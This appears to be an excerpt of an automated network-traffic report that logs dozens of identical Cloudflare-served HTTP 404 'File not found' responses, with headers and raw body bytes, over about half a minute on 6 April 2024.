Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:55 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=etE5AqzPg%2Fp5BABSnOixLhQiwNwr2ja0Le0zwg9pn%2FqX0Ph2oZqf4QKq1Yg6H9tWWhcdeqw1sKqVPEsb09rSnORZexbOONhKYw2%2FLUyu85l8oT39aNMBqs4qidDdI6IzzQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870011cf59379acf-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:56 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J8Ed%2BESZbfYAjg69WiYZEBDfBoTC5GDJLF03VgoYYCxw1dPS6SzLKmKbGOOl2WFflba0va0h56L3ARj7Vmfzu7AUur0uvOjPX5sBbBf5L4FRfDrZpVzubWFHxR0uO6lbmA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870011d43dd174aa-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:57 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D6P5tZWVzpJLz43XaJ%2Fv6b4z5LLormL6XLUnEzmrHipGj74SRxfkpjc3R2jlTsrligntW8tCIC4gK3IlPl2MY2q43b0LMO%2BjRRRd%2B9G%2B%2FeZNxznLnwnAtvWdxsA4se3%2Bhw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870011d91a53a554-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:57 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5pkg7WqhsY%2FngyicWhfUGEywdw2q%2BFpwksbpMVdSuvVL3yPSCt0CO7Dxw6v2E6m7uCCwRV6oZX4CjsCDD6U3%2Bdycutv0PHDzZasq8FEmFMVbvXVYGf%2F1aAQgYr4BDWBF4Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870011ddefb9748d-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:58 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LbGcZepgXDQMYEqteHeCKgkBkGe%2F2fcb3CnlbQWgQijbG7ZnbWL2uNl6jw4gMagSJ%2BNn4QJca%2BW5KDWQPOdGqiimrqSUrZkdTBPbUmR6u1TuIP3n2zzGMejhBrgIbx%2B5Wg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870011e2bcc82589-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:59 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KQWLx8XDMfgQu0WQ1%2B%2Ft7t1FZZ%2FnSWKuP150IEVE1w3ysz14GeDEkMTjHj6CZMNztYJzFuUHTxBNs2ZgWSWSQohtXtNRH0JOFySOy1Nr%2FEoB11w3vlwzkoT7fDhkvTOeJw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870011e7a8b25c7c-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:00 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4gVvu92rPAxY7UifkgQdDlNaXwDRTDHUU%2BmP36BAQetUgps8cw3Fp9ss1zpkWLx3KYBm%2Fk4R%2F77nFGYdH97uCSU3OBcDoiQbfDDjee8NY2SpBHTzQzJIK2cKu0%2BA6dHVZA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870011ec7cfb8dc6-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:00 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IahZIT4tvxvSLBo5fYqX4ZrCe3sCvTJi%2BY9%2Fi4ArsbwyMaklD3hCfSWqIO1MRYOcjShP2z%2FnOxSUSQn14mD%2FXP7i%2BxCAT8bolqvOr7HmAxuVJF0TjWdfTITENZ7kw3WH4g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870011f179fb8da8-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:01 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AT3YPz6o6szhrf6atFOql9n4tWCLpQKz%2FuAazdDJXFBB4SqHdiDx%2BXoB%2Bl1UzJAdGj9ocpfL5vlEpEn7BgycrrG0nNLi4w7bHmM1Dunn069793GQ%2FalOYh6%2BkZqoEgEo6A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870011f66ad8a54e-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:02 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A6YOvhgdIT6Z2jf9fyoYXsEO778yKErcrSlsXext1rBY%2FC7Yg8YyWdv7vb8356uxWLjksPiHmeWg3HIRuqlAqrQBNL3xCjNU22LHLNV6G%2FsSLTfx59M1XwmVNKg%2FREhIMA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870011fb38f1747f-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:03 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=32FYP0NzF%2BSRTmsxJ9ZcUXuF4uIGAblzg4OwZ85L6Foz1lHYScaGbhEMDue3m2tuswaYlVocp0vSltcjMLSln1k7jK2eHuCxvbKYEOsqN21dPl9JDxMYyT8lD0SmM9L8YQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870011fffa3ea524-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:04 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FnbBAHyLkNOa5aqaydUam3%2FqYL0RVYkIE%2FT%2FZ0HaPYUW40HU%2BVe714USuW2KmOxUR9lDD6xMkWn2z4%2BdZR51G%2FRyH72EcElJYtI7%2FiTT9nZffFNmQzDLg0fgMzZz6UX7ZQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87001204ed882888-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:04 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L615XcJZzDjYWsDyeEgRwPSvL6Y%2BbVMflTcRRU55lDMYRlGtceuRXOyPNKwqBoq1ABo6ysrPk%2FhkOevMZQepszfbz%2BD%2FCPJnufiUbDCuzzUjy341%2BYDOACi8N8rIVJ%2BDFg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87001209ac917439-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:05 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lYUfNWE9jn77%2FHjF8X385rySiz22PqC%2B72Je0N5%2Bh6MIFlNgB3xuG2cY2fpFicqrlnVyp5o08nOuUVBwlzhROfeDeFMZYqUDjEEgLLdvxi5xZYMA%2B4xct1nP2ZHTvvjXHA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700120e6d3c129b-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:06 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NimoAg5%2FXiHvIjDn36mo3FbjFSaCQZylxerow2D5WawNSqHV7aZGE%2BCax38sidzkjrJIHIt6KjSzLr1nw4pC8XSqIdASTD%2BodHDg1hM%2Bm5BTQS35XeY0wHpHCVjiSEe5Ig%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870012133c096daa-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:07 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HuBs%2BMAjusuFC9hlOM%2FgdevH1WY7J6eKDwKg%2Fr2VOcnLZFXqjQWjnwMpGYtoeCkYbHfrI6Ixp%2Bfs4X6VGbKni%2BmBpbacA8q9Wj4XVC94rLep8DtiTE0n91WKBRYeChyswQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870012188ee331dd-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:09 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2sCxI5p9GUnTa7ie2%2FFTUAgDnK5qhWBtsKRKsw040rsUoCMIptGdjfRVSeTRxy78sWigCOzaTAZMaMftGRWKhSmLRTMqjsuGqZCx9eeIZ61PEogv%2FeOksjNnvdnrrW8RYA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700122689be5c6a-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:10 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AOQjZT72Pgr7tI4uRS3BFLOwEu%2FeI5%2Bzid0AXoCaoSvWNkweeNCTYDPl1IXDe%2FqJlHDBK2ZrFQvZC2g1GJrH%2FIX9vVxZlHzCMVUsO3ZPssSO8gGFIeNRkJ8Q5wFJ%2FSTLhA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700122b68d331d7-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:10 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VWOb5u%2FtWkgAotx%2F0Xnp9PKkOXFlDwfDZhkLBy8R8E7hHrMunwr%2F3CPdwdEcgHnvZphyECKCx4bNcIAqhHYjH2pgU%2FSxwplYKYF4Jd%2BfbxLgyKvBJspwLsDmkRi%2F%2BZDjWw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700123038cd8758-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mytn67HKjgDtNSnsaZOdNxbAUD%2FU5TFPPqbO3EcBztzTVx6ENviHDwUw8O5MHOO%2FYw2F0d7dqa8%2F0bVWWh2CmKq8GyGn2ykc3itT0NkElCAn620jVM8xzhAbdGICIvW2Lw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870012351d1d5c63-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:12 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A8Z%2Bjw9qnFhRS5obRmBFjKkAROo3NIH35VEDQmwujDqmgFnsx8H2DUaYEYw8p5HCyFygpRnQFd3%2BQHcl8741itJtbB3lxiLhgAwMHtbPzoiI1yz%2FY6dzbdxD3NpXnZRT0g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87001239fe0f0a1a-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:13 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MfweIPOFJwhX9ErS8cZ1UEfcKRp7YDs9K%2BoWEaRUHfCQxx%2BzcayEHeEy9WKZKrgoRQQV1y0AaTc5yg7uaTjCpljdl8B0I57gmTrDL6NsFsXCdNhIAjkLzEkPzxOPPjTPkA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700123eca7325be-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:14 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LZYuTJcuhe0PhyTk8GdhASc8gDIQ%2F8c3%2Bk3w4cwhroM2oIPxwE7%2BGbY00I8e3%2B2Kg7TpTYkr6GtInb%2F3%2F60OOC2BuEm0pCj1w84dSpkSu1ecpDhuRYgsGj7%2Fl%2BizFI%2B7tA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87001243b88c2248-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:14 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oEzP9xn%2FY5kau4iQsTH9PXGrlSAw0f5WCdPdPmulAqU0c4TWV16AA5ubpMqdFN5zvLmyaJDzLWM979U715FzdfaCCFAK%2B5ky%2BfqCsLQaSSA501yhiwz5NAj1ANa5GedmtQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870012488ab1a4d3-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:15 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YjJwvUElWxyjGKnq9Ky7wxyXMg4u0mTfawc9Ijcwhe1yUpqml2v4t6UhDZRYiMmmzcVNOxS%2Bdqa0rofL%2BoQh4Sf32zWlcdijIIK4kOpADoG4RD6%2FnCBcZS%2BqfRkHGNGjAw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700124d6e7fda83-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:16 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qt2v6rNNDN8wBhQ0T2ngmJkpzLosI%2FXQqh764gGYFihJO3JuK0r02n2zcAxP4ZiI0J3kmyB5zk2T5onYagRMIHiqMrkXDbkyroao3IkFFQbvR2H5megjvCwHEhvzUfm1SQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870012524cdadaa9-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:17 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vXjH8gyu5sI8sEgmqqtxSdOWJfNVKN5SYhlpaGnGJt5owLwqNz5ihp8FWgan%2B33%2BL%2FCW5U98lw3wFv2PULXiq8ye%2B58n55475GtLAfKDYhfkNh1ud8GsftXErjjfX1YDlQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870012595dc3dafd-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:18 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jUGBHPQqTTJ%2F0%2F9RMPq8nmRQ77oDv7x9sXz8kqY11%2Ba24Wl96Av9ws2EeE0S7QuRH9ZkPEMTN3xklDRsYHu5mSErNHPJR4SfMN2CcWjocs%2BoOgQpuJZJLU1ObwwqabjETA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700125e3f9b9aef-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:19 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VFb8fynM98Cq7W7RU%2BIXPo0IEcbAlGC94r9I6h3rbRLSf8wzQ%2Fkxy4mUcWDruhpgARf8ZSyXtS5M7WD3drKPK4O8rJMWFnAbJCHW18s8KqbVv0qkugJUqdM4ng2MyvpTNg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870012631bdc7425-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:19 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nAUuJNb1JeodDMjtSVo4u7eKmWAeb1HUj7%2BkUgG7XYn%2B%2BP2FYKR5p8%2BhXdEYyK9OcgcDcib1%2BYyARgiIVpB4%2Fgev2iO3SEVOtUONG48mFc3uEEBYLR7s2FfxFecvIHcVeg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87001267e991336e-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:20 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NSvPD8%2FdGTkLhD9RPbD3jeec39d1T0P2lZD5d%2B3UcMKzq4RBUIIl85Nv4zmNTQAVvZwkyuzbOEYy%2F42be5254zU8q2yZUPBb60lgQIVEowK%2FgGgbDpcWo44EJ5J9mA2HHw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700126cbccba581-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:21 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7%2Fgq58GDnT02%2BRYIilL2ofIB946j8NE2bwPOtKHsWpm4DED9D0%2FOSd%2BnJ8c5zH6kNaIIG89t4TDPwFAjBtGoFjvkNhpaU9Ft7muzm%2BFyEgbgej45DFKVlr8D56FbQ69D6A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870012717e446c87-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
